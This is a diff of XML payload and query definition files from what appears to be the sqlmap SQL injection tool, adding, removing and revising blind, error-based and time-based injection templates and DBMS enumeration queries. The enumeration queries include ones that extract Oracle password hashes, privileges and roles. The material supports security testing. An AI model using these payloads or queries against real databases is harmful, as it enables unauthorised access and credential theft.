<regexp value="Apache/2\.4\.46 \(Ubuntu\)">
|
||||
<info type="Linux" distrib="Ubuntu" release="21.04|21.10" codename="hirsute|impish"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Apache/2\.4\.52 \(Ubuntu\)">
|
||||
<info type="Linux" distrib="Ubuntu" release="22.04" codename="jammy"/>
|
||||
<info type="Linux" distrib="Ubuntu" release="21.04|21.10" codename="eoan|focal"/>
|
||||
</regexp>
|
||||
|
||||
<!-- Nginx -->
|
||||
|
||||
@@ -199,7 +199,6 @@
|
||||
<error regexp="io\.prestosql\.jdbc"/>
|
||||
<error regexp="com\.simba\.presto\.jdbc"/>
|
||||
<error regexp="UNION query has different number of fields: \d+, \d+"/>
|
||||
<error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="Altibase">
|
||||
@@ -211,11 +210,6 @@
|
||||
<error regexp="Syntax error,[^\n]+assumed to mean"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="ClickHouse">
|
||||
<error regexp="Code: \d+. DB::Exception:"/>
|
||||
<error regexp="Syntax error: failed at position \d+"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="CrateDB">
|
||||
<error regexp="io\.crate\.client\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
@@ -484,18 +484,18 @@ Tag: <test>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
|
||||
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
|
||||
<stype>1</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>1</where>
|
||||
<vector>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
|
||||
<vector>AND ([INFERENCE])*[RANDNUM]</vector>
|
||||
<request>
|
||||
<payload>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
|
||||
<payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
|
||||
<comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
@@ -503,18 +503,18 @@ Tag: <test>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
|
||||
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
|
||||
<stype>1</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<clause>1,2,3</clause>
|
||||
<where>2</where>
|
||||
<vector>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>
|
||||
<vector>OR ([INFERENCE])*[RANDNUM]</vector>
|
||||
<request>
|
||||
<payload>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>
|
||||
<payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>
|
||||
<comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
@@ -596,45 +596,6 @@ Tag: <test>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
|
||||
<stype>1</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
|
||||
<request>
|
||||
<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
|
||||
<request>
|
||||
<payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SQLite</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
|
||||
|
||||
<!-- Boolean-based blind tests - Parameter replace -->
|
||||
|
||||
@@ -838,7 +838,7 @@
|
||||
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
@@ -853,44 +853,6 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!--
|
||||
TODO: if possible, add payload for SQLite, Microsoft Access,
|
||||
and SAP MaxDB - no known techniques at this time
|
||||
|
||||
@@ -133,25 +133,5 @@
|
||||
<dbms>Firebird</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse inline queries</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8</clause>
|
||||
<where>3</where>
|
||||
<vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
<payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of inline queries tests -->
|
||||
</root>
|
||||
|
||||
@@ -195,9 +195,9 @@
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,8,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -235,9 +235,9 @@
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -276,9 +276,9 @@
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
@@ -318,9 +318,9 @@
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
@@ -1494,44 +1494,6 @@
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse AND time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>ClickHouse OR time-based blind (heavy query)</title>
|
||||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>ClickHouse</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<!-- End of time-based boolean tests -->
|
||||
|
||||
<!-- Time-based boolean tests - Numerous clauses -->
|
||||
@@ -1645,10 +1607,10 @@
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
|
||||
<where>1</where>
|
||||
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
|
||||
<request>
|
||||
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
|
||||
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[DELAYED]</time>
|
||||
@@ -1918,7 +1880,7 @@
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<where>1</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
|
||||
@@ -1938,7 +1900,7 @@
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<where>1</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
|
||||
|
||||
@@ -207,7 +207,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS CAP FROM %s)x WHERE CAP=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
|
||||
@@ -228,7 +228,7 @@
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS CAP %s) WHERE CAP"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
@@ -261,11 +261,11 @@
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
|
||||
<blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS CAP FROM SYS.ALL_USERS) WHERE CAP=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
|
||||
<blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME,PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS CAP FROM SYS.USER$ WHERE NAME='%s') WHERE CAP=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
<blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
@@ -273,7 +273,7 @@
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE,PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME,PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
<blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
@@ -281,20 +281,20 @@
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
<blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<statements>
|
||||
<inband query="SELECT SQL_TEXT FROM V$SQL"/>
|
||||
<blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS CAP FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE CAP=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
|
||||
<blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS LIMIT FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE LIMIT=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
|
||||
</statements>
|
||||
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
|
||||
<dbs>
|
||||
<inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)"/>
|
||||
<blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS CAP FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE CAP=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
|
||||
<blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS LIMIT FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES" condition="OWNER"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS CAP FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE CAP=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
|
||||
@@ -302,7 +302,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s ORDER BY ROWNUM"/>
|
||||
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS CAP FROM %s qq ORDER BY ROWNUM) WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq ORDER BY ROWNUM) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
|
||||
<search_db>
|
||||
@@ -357,8 +357,8 @@
|
||||
<blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT MAX(sql) FROM sqlite_master WHERE type='table' AND tbl_name='%s'"/>
|
||||
<blind query="SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name='%s' LIMIT 1" condition=""/>
|
||||
<inband query="SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='%s'"/>
|
||||
<blind query="SELECT sql FROM sqlite_master WHERE tbl_name='%s' LIMIT 1" condition=""/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
@@ -606,7 +606,7 @@
|
||||
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
|
||||
<isnull query="COALESCE(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS CAP %s) AS qq WHERE CAP"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS qq WHERE LIMIT"/>
|
||||
<limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
@@ -621,7 +621,7 @@
|
||||
<hex query="HEX(%s)"/>
|
||||
<inference query="SUBSTR((%s),%d,1)>'%c'"/>
|
||||
<!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
|
||||
